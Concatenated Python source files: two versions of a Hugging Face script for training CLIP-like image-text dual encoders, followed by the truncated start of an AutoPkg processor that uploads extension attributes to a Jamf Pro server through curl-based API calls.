default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
def __post_init__(self):
if self.dataset_name is None and self.train_file is None and self.validation_file is None:
raise ValueError("Need either a dataset name or a training/validation file.")
else:
if self.train_file is not None:
extension = self.train_file.split(".")[-1]
assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
assert extension in ["csv", "json"], "`validation_file` should be a csv or a json file."
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
assert extension == "json", "`validation_file` should be a json file."
dataset_name_mapping = {
"image_caption_dataset.py": ("image_path", "caption"),
}
# We use torchvision for faster image pre-processing. The transforms are implemented as nn.Module,
# so we jit it to be faster.
class Transform(torch.nn.Module):
def __init__(self, image_size, mean, std):
super().__init__()
self.transforms = torch.nn.Sequential(
Resize([image_size], interpolation=InterpolationMode.BICUBIC),
CenterCrop(image_size),
ConvertImageDtype(torch.float),
Normalize(mean, std),
)
def forward(self, x: Image) -> torch.Tensor:
with torch.no_grad():
x = self.transforms(x)
return x
def collate_fn(examples):
pixel_values = torch.stack([example["pixel_values"] for example in examples])
input_ids = torch.tensor([example["input_ids"] for example in examples], dtype=torch.long)
attention_mask = torch.tensor([example["attention_mask"] for example in examples], dtype=torch.long)
return {
"pixel_values": pixel_values,
"input_ids": input_ids,
"attention_mask": attention_mask,
"return_loss": True,
}
def main():
# 1. Parse input arguments
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# 2. Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
logger.info(f"Training/evaluation parameters {training_args}")
# 3. Detecting last checkpoint and eventualy continue from last checkpoint
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# 4. Load dataset
# Get the datasets: you can either provide your own CSV/JSON training and evaluation files (see below)
# or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/
# (the dataset will be downloaded automatically from the datasets Hub).
#
# For CSV/JSON files this script will use the first column for the full image path and the second column for the
# captions (unless you specify column names for this with the `image_column` and `caption_column` arguments).
#
if data_args.dataset_name is not None:
# Downloading and loading a dataset from the hub.
dataset = load_dataset(
data_args.dataset_name,
data_args.dataset_config_name,
cache_dir=model_args.cache_dir,
keep_in_memory=False,
data_dir=data_args.data_dir,
)
else:
data_files = {}
if data_args.train_file is not None:
data_files["train"] = data_args.train_file
extension = data_args.train_file.split(".")[-1]
if data_args.validation_file is not None:
data_files["validation"] = data_args.validation_file
extension = data_args.validation_file.split(".")[-1]
if data_args.test_file is not None:
data_files["test"] = data_args.test_file
extension = data_args.test_file.split(".")[-1]
dataset = load_dataset(extension, data_files=data_files, cache_dir=model_args.cache_dir)
# See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# 5. Load pretrained model, tokenizer, and feature extractor
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name, cache_dir=model_args.cache_dir, use_fast=model_args.use_fast_tokenizer
)
elif model_args.model_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(
model_args.model_name_or_path, cache_dir=model_args.cache_dir, use_fast=model_args.use_fast_tokenizer
)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Load feature_extractor, in this script we only use this to get the mean and std for normalization.
feature_extractor = AutoFeatureExtractor.from_pretrained(
model_args.feature_extractor_name or model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
model = AutoModel.from_pretrained(
model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
config = model.config
def _freeze_params(module):
for param in module.parameters():
param.requires_grad = False
if model_args.freeze_vision_model:
_freeze_params(model.vision_model)
if model_args.freeze_text_model:
_freeze_params(model.text_model)
# set seed for torch dataloaders
set_seed(training_args.seed)
# Preprocessing the datasets.
# We need to tokenize inputs and targets.
if training_args.do_train:
column_names = dataset["train"].column_names
elif training_args.do_eval:
column_names = dataset["validation"].column_names
elif training_args.do_predict:
column_names = dataset["test"].column_names
else:
logger.info("There is nothing to do. Please pass `do_train`, `do_eval` and/or `do_predict`.")
return
# 6. Get the column names for input/target.
dataset_columns = dataset_name_mapping.get(data_args.dataset_name, None)
if data_args.image_column is None:
image_column = dataset_columns[0] if dataset_columns is not None else column_names[0]
else:
image_column = data_args.image_column
if image_column not in column_names:
raise ValueError(
f"--image_column' value '{data_args.image_column}" needs to be one of: {", ".join(column_names)}"
)
if data_args.caption_column is None:
caption_column = dataset_columns[1] if dataset_columns is not None else column_names[1]
else:
caption_column = data_args.caption_column
if caption_column not in column_names:
raise ValueError(
f"--caption_column' value '{data_args.caption_column}" needs to be one of: {", ".join(column_names)}"
)
# 7. Preprocessing the datasets.
# Initialize torchvision transforms and jit it for faster processing.
image_transformations = Transform(
config.vision_config.image_size, feature_extractor.image_mean, feature_extractor.image_std
)
image_transformations = torch.jit.script(image_transformations)
# Preprocessing the datasets.
# We need to tokenize input captions and transform the images.
def tokenize_captions(examples):
captions = [caption for caption in examples[caption_column]]
text_inputs = tokenizer(captions, max_length=data_args.max_seq_length, padding="max_length", truncation=True)
examples["input_ids"] = text_inputs.input_ids
examples["attention_mask"] = text_inputs.attention_mask
return examples
def transform_images(examples):
images = [read_image(image_file, mode=ImageReadMode.RGB) for image_file in examples[image_column]]
examples["pixel_values"] = [image_transformations(image) for image in images]
return examples
def filter_corrupt_images(examples):
"""remove problematic images"""
valid_images = []
for image_file in examples[image_column]:
try:
Image.open(image_file)
valid_images.append(True)
except Exception:
valid_images.append(False)
return valid_images
if training_args.do_train:
if "train" not in dataset:
raise ValueError("--do_train requires a train dataset")
train_dataset = dataset["train"]
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
train_dataset = train_dataset.filter(
filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
)
train_dataset = train_dataset.map(
function=tokenize_captions,
batched=True,
remove_columns=[col for col in column_names if col != image_column],
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=not data_args.overwrite_cache,
desc="Running tokenizer on train dataset",
)
# Transform images on the fly as doing it on the whole dataset takes too much time.
train_dataset.set_transform(transform_images)
if training_args.do_eval:
if "validation" not in dataset:
raise ValueError("--do_eval requires a train validation")
eval_dataset = dataset["validation"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
eval_dataset = eval_dataset.filter(
filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
)
eval_dataset = eval_dataset.map(
function=tokenize_captions,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=[col for col in column_names if col != image_column],
load_from_cache_file=not data_args.overwrite_cache,
desc="Running tokenizer on validation dataset",
)
# Transform images on the fly as doing it on the whole dataset takes too much time.
eval_dataset.set_transform(transform_images)
if training_args.do_predict:
if "test" not in dataset:
raise ValueError("--do_predict requires a test dataset")
test_dataset = dataset["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(test_dataset), data_args.max_eval_samples)
test_dataset = test_dataset.select(range(max_eval_samples))
test_dataset = test_dataset.filter(
filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
)
test_dataset = test_dataset.map(
function=tokenize_captions,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=[col for col in column_names if col != image_column],
load_from_cache_file=not data_args.overwrite_cache,
desc="Running tokenizer on test dataset",
)
# Transform images on the fly as doing it on the whole dataset takes too much time.
test_dataset.set_transform(transform_images)
# 8. Initalize our trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
data_collator=collate_fn,
)
# 9. Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
trainer.save_model()
trainer.log_metrics("train", train_result.metrics)
trainer.save_metrics("train", train_result.metrics)
trainer.save_state()
# 10. Evaluation
if training_args.do_eval:
metrics = trainer.evaluate()
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
# 11. Write Training Stats and push to hub.
kwargs = {"finetuned_from": model_args.model_name_or_path, "tasks": "contrastive-image-text-modeling"}
if data_args.dataset_name is not None:
kwargs["dataset_tags"] = data_args.dataset_name
if data_args.dataset_config_name is not None:
kwargs["dataset_args"] = data_args.dataset_config_name
kwargs["dataset"] = f"{data_args.dataset_name} {data_args.dataset_config_name}"
else:
kwargs["dataset"] = data_args.dataset_name
if training_args.push_to_hub:
trainer.push_to_hub(**kwargs)
else:
trainer.create_model_card(**kwargs)
if __name__ == "__main__":
main()
| #!/usr/bin/env python
# coding=utf-8
# Copyright 2022 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Training a CLIP like dual encoder models using text and vision encoders in the library.
The script can be used to train CLIP like models for languages other than English by using
a text encoder pre-trained in the desired language. Currently this script supports the following vision
and text models:
Vision models: ViT(https://huggingface.co/models?filter=vit), CLIP (https://huggingface.co/models?filter=clip)
Text models: BERT, ROBERTa (https://huggingface.co/models?filter=fill-mask)
"""
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import torch
from datasets import load_dataset
from PIL import Image
from torchvision.io import ImageReadMode, read_image
from torchvision.transforms import CenterCrop, ConvertImageDtype, Normalize, Resize
from torchvision.transforms.functional import InterpolationMode
import transformers
from transformers import (
AutoFeatureExtractor,
AutoModel,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
set_seed,
)
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
logger = logging.getLogger(__name__)
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.18.0.dev0")
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/contrastive-image-text/requirements.txt")
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
feature_extractor_name: str = field(default=None, metadata={"help": "Name or path of preprocessor config."})
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
freeze_vision_model: bool = field(
default=False, metadata={"help": "Whether to freeze the vision model parameters or not."}
)
freeze_text_model: bool = field(
default=False, metadata={"help": "Whether to freeze the text model parameters or not."}
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_name: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
data_dir: Optional[str] = field(default=None, metadata={"help": "The data directory containing input files."})
image_column: Optional[str] = field(
default="image_path",
metadata={"help": "The name of the column in the datasets containing the full image file paths."},
)
caption_column: Optional[str] = field(
default="caption",
metadata={"help": "The name of the column in the datasets containing the image captions."},
)
train_file: Optional[str] = field(
default=None, metadata={"help": "The input training data file (a jsonlines file)."}
)
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file (a jsonlines file)."},
)
max_seq_length: Optional[int] = field(
default=128,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
def __post_init__(self):
if self.dataset_name is None and self.train_file is None and self.validation_file is None:
raise ValueError("Need either a dataset name or a training/validation file.")
else:
if self.train_file is not None:
extension = self.train_file.split(".")[-1]
assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
assert extension in ["csv", "json"], "`validation_file` should be a csv or a json file."
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
assert extension == "json", "`validation_file` should be a json file."
dataset_name_mapping = {
"image_caption_dataset.py": ("image_path", "caption"),
}
# We use torchvision for faster image pre-processing. The transforms are implemented as nn.Module,
# so we jit it to be faster.
class Transform(torch.nn.Module):
def __init__(self, image_size, mean, std):
super().__init__()
self.transforms = torch.nn.Sequential(
Resize([image_size], interpolation=InterpolationMode.BICUBIC),
CenterCrop(image_size),
ConvertImageDtype(torch.float),
Normalize(mean, std),
)
def forward(self, x: Image) -> torch.Tensor:
with torch.no_grad():
x = self.transforms(x)
return x
def collate_fn(examples):
pixel_values = torch.stack([example["pixel_values"] for example in examples])
input_ids = torch.tensor([example["input_ids"] for example in examples], dtype=torch.long)
attention_mask = torch.tensor([example["attention_mask"] for example in examples], dtype=torch.long)
return {
"pixel_values": pixel_values,
"input_ids": input_ids,
"attention_mask": attention_mask,
"return_loss": True,
}
def main():
# 1. Parse input arguments
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# 2. Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
logger.info(f"Training/evaluation parameters {training_args}")
# 3. Detecting last checkpoint and eventualy continue from last checkpoint
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# 4. Load dataset
# Get the datasets: you can either provide your own CSV/JSON training and evaluation files (see below)
# or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/
# (the dataset will be downloaded automatically from the datasets Hub).
#
# For CSV/JSON files this script will use the first column for the full image path and the second column for the
# captions (unless you specify column names for this with the `image_column` and `caption_column` arguments).
#
if data_args.dataset_name is not None:
# Downloading and loading a dataset from the hub.
dataset = load_dataset(
data_args.dataset_name,
data_args.dataset_config_name,
cache_dir=model_args.cache_dir,
keep_in_memory=False,
data_dir=data_args.data_dir,
)
else:
data_files = {}
if data_args.train_file is not None:
data_files["train"] = data_args.train_file
extension = data_args.train_file.split(".")[-1]
if data_args.validation_file is not None:
data_files["validation"] = data_args.validation_file
extension = data_args.validation_file.split(".")[-1]
if data_args.test_file is not None:
data_files["test"] = data_args.test_file
extension = data_args.test_file.split(".")[-1]
dataset = load_dataset(extension, data_files=data_files, cache_dir=model_args.cache_dir)
# See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# 5. Load pretrained model, tokenizer, and feature extractor
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name, cache_dir=model_args.cache_dir, use_fast=model_args.use_fast_tokenizer
)
elif model_args.model_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(
model_args.model_name_or_path, cache_dir=model_args.cache_dir, use_fast=model_args.use_fast_tokenizer
)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Load feature_extractor, in this script we only use this to get the mean and std for normalization.
feature_extractor = AutoFeatureExtractor.from_pretrained(
model_args.feature_extractor_name or model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
model = AutoModel.from_pretrained(
model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
config = model.config
def _freeze_params(module):
for param in module.parameters():
param.requires_grad = False
if model_args.freeze_vision_model:
_freeze_params(model.vision_model)
if model_args.freeze_text_model:
_freeze_params(model.text_model)
# set seed for torch dataloaders
set_seed(training_args.seed)
# Preprocessing the datasets.
# We need to tokenize inputs and targets.
if training_args.do_train:
column_names = dataset["train"].column_names
elif training_args.do_eval:
column_names = dataset["validation"].column_names
elif training_args.do_predict:
column_names = dataset["test"].column_names
else:
logger.info("There is nothing to do. Please pass `do_train`, `do_eval` and/or `do_predict`.")
return
# 6. Get the column names for input/target.
dataset_columns = dataset_name_mapping.get(data_args.dataset_name, None)
if data_args.image_column is None:
image_column = dataset_columns[0] if dataset_columns is not None else column_names[0]
else:
image_column = data_args.image_column
if image_column not in column_names:
raise ValueError(
f"--image_column' value '{data_args.image_column}' needs to be one of: {', '.join(column_names)}"
)
if data_args.caption_column is None:
caption_column = dataset_columns[1] if dataset_columns is not None else column_names[1]
else:
caption_column = data_args.caption_column
if caption_column not in column_names:
raise ValueError(
f"--caption_column' value '{data_args.caption_column}' needs to be one of: {', '.join(column_names)}"
)
# 7. Preprocessing the datasets.
# Initialize torchvision transforms and jit it for faster processing.
image_transformations = Transform(
config.vision_config.image_size, feature_extractor.image_mean, feature_extractor.image_std
)
image_transformations = torch.jit.script(image_transformations)
# Preprocessing the datasets.
# We need to tokenize input captions and transform the images.
def tokenize_captions(examples):
captions = [caption for caption in examples[caption_column]]
text_inputs = tokenizer(captions, max_length=data_args.max_seq_length, padding="max_length", truncation=True)
examples["input_ids"] = text_inputs.input_ids
examples["attention_mask"] = text_inputs.attention_mask
return examples
def transform_images(examples):
images = [read_image(image_file, mode=ImageReadMode.RGB) for image_file in examples[image_column]]
examples["pixel_values"] = [image_transformations(image) for image in images]
return examples
def filter_corrupt_images(examples):
"""remove problematic images"""
valid_images = []
for image_file in examples[image_column]:
try:
Image.open(image_file)
valid_images.append(True)
except Exception:
valid_images.append(False)
return valid_images
if training_args.do_train:
if "train" not in dataset:
raise ValueError("--do_train requires a train dataset")
train_dataset = dataset["train"]
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
train_dataset = train_dataset.filter(
filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
)
train_dataset = train_dataset.map(
function=tokenize_captions,
batched=True,
remove_columns=[col for col in column_names if col != image_column],
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=not data_args.overwrite_cache,
desc="Running tokenizer on train dataset",
)
# Transform images on the fly as doing it on the whole dataset takes too much time.
train_dataset.set_transform(transform_images)
if training_args.do_eval:
if "validation" not in dataset:
raise ValueError("--do_eval requires a train validation")
eval_dataset = dataset["validation"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
eval_dataset = eval_dataset.filter(
filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
)
eval_dataset = eval_dataset.map(
function=tokenize_captions,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=[col for col in column_names if col != image_column],
load_from_cache_file=not data_args.overwrite_cache,
desc="Running tokenizer on validation dataset",
)
# Transform images on the fly as doing it on the whole dataset takes too much time.
eval_dataset.set_transform(transform_images)
if training_args.do_predict:
if "test" not in dataset:
raise ValueError("--do_predict requires a test dataset")
test_dataset = dataset["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(test_dataset), data_args.max_eval_samples)
test_dataset = test_dataset.select(range(max_eval_samples))
test_dataset = test_dataset.filter(
filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
)
test_dataset = test_dataset.map(
function=tokenize_captions,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=[col for col in column_names if col != image_column],
load_from_cache_file=not data_args.overwrite_cache,
desc="Running tokenizer on test dataset",
)
# Transform images on the fly as doing it on the whole dataset takes too much time.
test_dataset.set_transform(transform_images)
# 8. Initalize our trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
data_collator=collate_fn,
)
# 9. Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
trainer.save_model()
trainer.log_metrics("train", train_result.metrics)
trainer.save_metrics("train", train_result.metrics)
trainer.save_state()
# 10. Evaluation
if training_args.do_eval:
metrics = trainer.evaluate()
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
# 11. Write Training Stats and push to hub.
kwargs = {"finetuned_from": model_args.model_name_or_path, "tasks": "contrastive-image-text-modeling"}
if data_args.dataset_name is not None:
kwargs["dataset_tags"] = data_args.dataset_name
if data_args.dataset_config_name is not None:
kwargs["dataset_args"] = data_args.dataset_config_name
kwargs["dataset"] = f"{data_args.dataset_name} {data_args.dataset_config_name}"
else:
kwargs["dataset"] = data_args.dataset_name
if training_args.push_to_hub:
trainer.push_to_hub(**kwargs)
else:
trainer.create_model_card(**kwargs)
if __name__ == "__main__":
main()
|
#!/usr/local/autopkg/python
"""
JamfExtensionAttributeUploader processor for uploading extension attributes
to Jamf Pro using AutoPkg
by G Pugh
"""
import json
import re
import os
import subprocess
import uuid
from collections import namedtuple
from base64 import b64encode
from pathlib import Path
from shutil import rmtree
from time import sleep
from xml.sax.saxutils import escape
from autopkglib import Processor, ProcessorError # pylint: disable=import-error
class JamfExtensionAttributeUploader(Processor):
"""A processor for AutoPkg that will upload an item to a Jamf Cloud or on-prem server."""
input_variables = {
"JSS_URL": {
"required": True,
"description": "URL to a Jamf Pro server that the API user has write access "
"to, optionally set as a key in the com.github.autopkg "
"preference file.",
},
"API_USERNAME": {
"required": True,
"description": "Username of account with appropriate access to "
"jss, optionally set as a key in the com.github.autopkg "
"preference file.",
},
"API_PASSWORD": {
"required": True,
"description": "Password of api user, optionally set as a key in "
"the com.github.autopkg preference file.",
},
"ea_name": {
"required": False,
"description": "Extension Attribute name",
"default": "",
},
"ea_script_path": {
"required": False,
"description": "Full path to the script to be uploaded",
},
"replace_ea": {
"required": False,
"description": "Overwrite an existing category if True.",
"default": False,
},
}
output_variables = {
"jamfextensionattributeuploader_summary_result": {
"description": "Description of interesting results.",
},
}
# do not edit directly - copy from template
def write_json_file(self, data, tmp_dir="/tmp/jamf_upload"):
"""dump some json to a temporary file"""
self.make_tmp_dir(tmp_dir)
tf = os.path.join(tmp_dir, f"jamf_upload_{str(uuid.uuid4())}.json")
with open(tf, "w") as fp:
json.dump(data, fp)
return tf
# do not edit directly - copy from template
def write_temp_file(self, data, tmp_dir="/tmp/jamf_upload"):
"""dump some text to a temporary file"""
self.make_tmp_dir(tmp_dir)
tf = os.path.join(tmp_dir, f"jamf_upload_{str(uuid.uuid4())}.txt")
with open(tf, "w") as fp:
fp.write(data)
return tf
# do not edit directly - copy from template
def make_tmp_dir(self, tmp_dir="/tmp/jamf_upload"):
"""make the tmp directory"""
if not os.path.exists(tmp_dir):
os.mkdir(tmp_dir)
return tmp_dir
# do not edit directly - copy from template
def clear_tmp_dir(self, tmp_dir="/tmp/jamf_upload"):
"""remove the tmp directory"""
if os.path.exists(tmp_dir):
rmtree(tmp_dir)
return tmp_dir
# do not edit directly - copy from template
def curl(self, method, url, auth, data="", additional_headers=""):
"""
build a curl command based on method (GET, PUT, POST, DELETE)
If the URL contains 'uapi' then token should be passed to the auth variable,
otherwise the enc_creds variable should be passed to the auth variable
"""
tmp_dir = self.make_tmp_dir()
headers_file = os.path.join(tmp_dir, "curl_headers_from_jamf_upload.txt")
output_file = os.path.join(tmp_dir, "curl_output_from_jamf_upload.txt")
cookie_jar = os.path.join(tmp_dir, "curl_cookies_from_jamf_upload.txt")
# build the curl command
curl_cmd = [
"/usr/bin/curl",
"--silent",
"--show-error",
"-X",
method,
"-D",
headers_file,
"--output",
output_file,
url,
]
# authorisation if using Jamf Pro API or Classic API
# if using uapi and we already have a token then we use the token for authorization
if "uapi" in url and "tokens" not in url:
curl_cmd.extend(["--header", f"authorization: Bearer {auth}"])
# basic auth to obtain a token, or for classic API
elif "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
curl_cmd.extend(["--header", f"authorization: Basic {auth}"])
# set either Accept or Content-Type depending on method
if method == "GET" or method == "DELETE":
curl_cmd.extend(["--header", "Accept: application/json"])
# icon upload requires special method
elif method == "POST" and "fileuploads" in url:
curl_cmd.extend(["--header", "Content-type: multipart/form-data"])
curl_cmd.extend(["--form", f"name=@{data}"])
elif method == "POST" or method == "PUT":
if data:
if "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
# jamf data upload requires upload-file argument
curl_cmd.extend(["--upload-file", data])
else:
# slack requires data argument
curl_cmd.extend(["--data", data])
# uapi and slack accepts json, classic API only accepts xml
if "JSSResource" in url:
curl_cmd.extend(["--header", "Content-type: application/xml"])
else:
curl_cmd.extend(["--header", "Content-type: application/json"])
else:
self.output(f"WARNING: HTTP method {method} not supported")
# write session for jamf requests
if "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
try:
with open(headers_file, "r") as file:
headers = file.readlines()
existing_headers = [x.strip() for x in headers]
for header in existing_headers:
if "APBALANCEID" in header or "AWSALB" in header:
with open(cookie_jar, "w") as fp:
fp.write(header)
except IOError:
pass
# look for existing session
try:
with open(cookie_jar, "r") as file:
headers = file.readlines()
existing_headers = [x.strip() for x in headers]
for header in existing_headers:
